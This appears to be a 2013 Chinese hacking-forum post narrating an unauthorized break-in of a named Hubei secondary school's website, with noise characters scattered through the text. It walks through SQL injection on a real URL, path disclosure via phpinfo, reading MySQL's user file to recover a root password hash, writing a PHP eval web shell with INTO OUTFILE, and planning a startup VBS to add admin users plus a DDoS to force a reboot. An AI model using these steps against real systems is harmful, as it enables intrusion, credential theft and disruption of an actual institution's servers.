中国网络渗透测试联盟

标题: 友情检测湖北省大治市第一中学 [打印本页]

作者: admin    时间: 2013-1-11 21:32
标题: 友情检测湖北省大治市第一中学
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
; b; T& N( ]" b. p. T发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!/ ^8 @8 s5 s$ e1 [- L# X
/ O+ b% |" F, j9 L- @9 s& l# U3 x
1 a: Q, H( j1 ^: R3 {
5 W  B1 k. E0 k8 P) O9 j3 f" b6 ]
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 . S" B3 A+ s8 P! ^
" S- j8 f$ p. N
那么想可以直接写入shell ,getshell有几个条件:
6 q: J3 ^' G1 f0 P! O" \6 r$ B6 r
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF' B/ K' y2 I8 k8 m- m
1 P! Z+ n+ U: R) y9 B' Q' x. a
试着爆绝对路径:9 S  L0 G1 I- g+ j# Z- Y% l
1./phpMyAdmin/index.php?lang[]=1  : ?2 ]4 d8 w+ [% j2 s# l: x  k) n1 {
2./phpMyAdmin/phpinfo.php  - y; s& ^0 [+ q) `- B$ C6 ^/ I$ y5 @
3./load_file()  
4 T7 j! W2 H8 T* U& q! \4./phpmyadmin/themes/darkblue_orange/layout.inc.php  5 S9 D! b8 o+ O& h2 p( K% m
5./phpmyadmin/libraries/select_lang.lib.php  ) r" g! r' M5 ]* W9 |! R
6./phpmyadmin/libraries/lect_lang.lib.php  
3 H+ `" N1 L) J' s- @7./phpmyadmin/libraries/mcrypt.lib.php   5 l, D. _* c; c8 r+ D$ }- {: F
8./phpmyadmin/libraries/export/xls.php  $ B! Z7 T) s  M# Y* X9 T

+ y+ d+ j3 c/ I: V: z# m( V均不行...........................2 G8 F8 x# o: l
9 |9 A1 {3 v3 f5 L( [8 p
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
  h; X6 R5 y3 W, B& q9 p
  z. b# S6 G7 O权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
3 \! N, E" M4 }% X9 r' E
  K. G% F0 [! Q6 }- P/ ~9 o默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
2 X  w# f! u1 b- y
4 Q, i4 e  T+ f& m" r/ U敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........' e( [% j9 D7 f% g3 M

" F" n7 I$ ^) e4 e1 R想想root还可以读,读到root密码进phpmyadmin 也可以拿shell # w2 P0 x6 Y* i% Y" B$ E

! W4 A( d6 z; D6 q+ Hhttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini , \4 H# L! g  ?% Z# ^8 f9 Q
3 c& U( H5 s( F9 G# A2 [7 {* p  p
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD / n' p& D+ o0 c" s7 Q2 w. _
% K! d2 T  u: M; l( _! `
成功读到root密码:- }& K# F! I' S/ s: u0 c

, ]$ {# ~1 l! {17---- r(0072)3 j4 }$ I6 `3 x1 X
18---- o(006f). c+ ~- y8 W$ L' f5 E
19---- o(006f)
% ]+ w$ e& R" Z3 [, s; ]. H9 G2 W20---- t(0074)! s+ X: f% K9 I( u1 y
21---- *(002a)
9 s( U4 y$ \( X$ Q* d" \22---- 8(0038)7 }. J& f/ P; P; u! p* I$ l8 V4 d; ?9 X
23---- 2(0032)
4 b2 m% m1 \. G! l3 u24---- E(0045)
5 C) w$ ]7 R7 G& b25---- 1(0031)
# Z0 J6 l$ w' o, S; ]2 P* W26---- C(0043)
) ]) G* O1 b2 ]27---- 5(0035)
6 f3 J+ _0 A8 `; Q8 x+ V1 m28---- 8(0038)
: u/ m  k, q1 v/ s- o29---- 2(0032)
! ~% F0 M4 s, y+ K30---- 8(0038); c% _  [3 f) P
31---- A(0041)
  F: r' @5 n) \9 P) U& ?- [) V32---- 9(0039)4 v6 O$ v7 _: E; w5 S- f
33---- B(0042)
" X3 I2 D0 z1 P8 b. ^4 |34---- 5(0035)
7 x& B9 y* `( d+ i9 Q7 `# v35---- 4(0034)" C' m. G2 y3 S" Y, P4 o9 k
36---- 8(0038)
6 U+ g- g: M1 L2 l; p% X% I9 k: n) X37---- 6(0036)% e. {6 D/ G7 s
38---- 4(0034)
2 K2 T; x( r9 M  ~: f39---- 9(0039)( L3 Q$ X5 q; p, e/ |6 p
40---- 1(0031)! n7 t; q4 T6 s1 U8 c+ k1 B
41---- 1(0031)( x+ V5 g  @2 D7 A) g
42---- 5(0035)- D" O7 e5 O5 w# {( l" O0 t
43---- 3(0033)' b9 D' y1 M: _/ }
44---- 5(0035)
/ V. I  L7 k; K+ V) r" X2 |' e45---- 9(0039)3 e2 \; @, {4 N, X* A5 |1 R
46---- 8(0038)
2 s: V  a; j: d) l2 s47---- F(0046)
* s' n, F' P" C. q1 y48---- F(0046)+ J0 n" N8 n  Y5 \' M
49---- 4(0034)5 y# ~5 C! H4 ^4 F' ]- Z, O
50---- F(0046)
5 I: F. t+ F, i- z51---- 0(0030)
- ^6 w# ~( {+ R4 g+ ~52---- 3(0033)8 P1 K9 ]9 t& J
53---- 2(0032)
0 H3 ?) I8 Q$ i# [' ]54---- A(0041)
2 W) [! {- ^/ e! h2 S4 b55---- 4(0034)# f% F' T5 h. E- v9 A: D
56---- A(0041)  ?5 L. Y6 L2 B% m
57---- B(0042)4 N9 e' N4 p' f, ?
58---- *(0044); C5 d, M; B: M- }) i3 g
59---- *(0035)
+ v6 ^- ^3 @3 }; S8 L* m$ U60---- *(0041)- W: Y& B/ Z. w: d
61---- *0032)1 ^- F2 c* R6 n) q9 L! P

- c2 b. }3 `; l. h7 M7 T% ?解密后成功登陆phpmyamin  ^$ R5 L; v/ o, n1 J4 j
                          " O$ l) w" K! K* R  B# |' T: T

0 ?: t. f# Y. L; A  N, Q; r                             [attach]164[/attach]
1 ^4 k/ I; p  N* \
3 M/ G! _2 x9 r5 S找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'; `) h, t' T8 f2 ^6 x' l

. J; [' L  v9 |" Y6 e成功执行,拿下shell,菜刀连接:
' B5 t" x1 z* F6 j1 ~, N. H: U, ?4 T, @
服务器不支持asp,aspx,php提权无果...................+ s- f: ?2 ?- w9 b3 K

2 U' S$ P/ G) U* V( b8 I" ^' }但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
4 _5 A- e5 \% _1 s+ F/ d
服务器上已经有个隐藏帐号了
: p2 s( Z/ t" M( H0 W4 w
别名     administrators
' m5 k1 S2 {8 {- b注释     管理员对计算机/域有不受限制的完全访问权

9 l* ~5 d' u+ s& F8 z
成员

7 U  e4 u$ f4 F/ P# N
-------------------------------------------------------------------------------1 ]: |+ S$ t5 j% Z) H7 g( Q! S
admin% z, C/ W, k( c5 s  B, }6 H
Administrator  e3 H5 K0 f" j% z: z+ o
slipper$
- Y, z/ t  k7 A7 p$ z$ \9 @0 u! Usqluser
. w1 i  t4 X- T命令成功完成。
" b! D1 U7 Q6 L. D% |# N& _5 R+ V, c+ h
6 m" ^7 k  s: G  T% ^. L' G服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。1 T3 {0 D% F+ @* d9 R
" A. R; l! }3 D3 x, R+ W8 P) H( ]
ddos服务器重启,不然就只能坐等服务器重启了...............................) q' R2 y* p: q

8 E# g- J3 N, s" k1 D( o5 Q      
8 j' @+ ?+ d% H7 Z. b4 V

作者: angel    时间: 2013-5-20 15:28





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2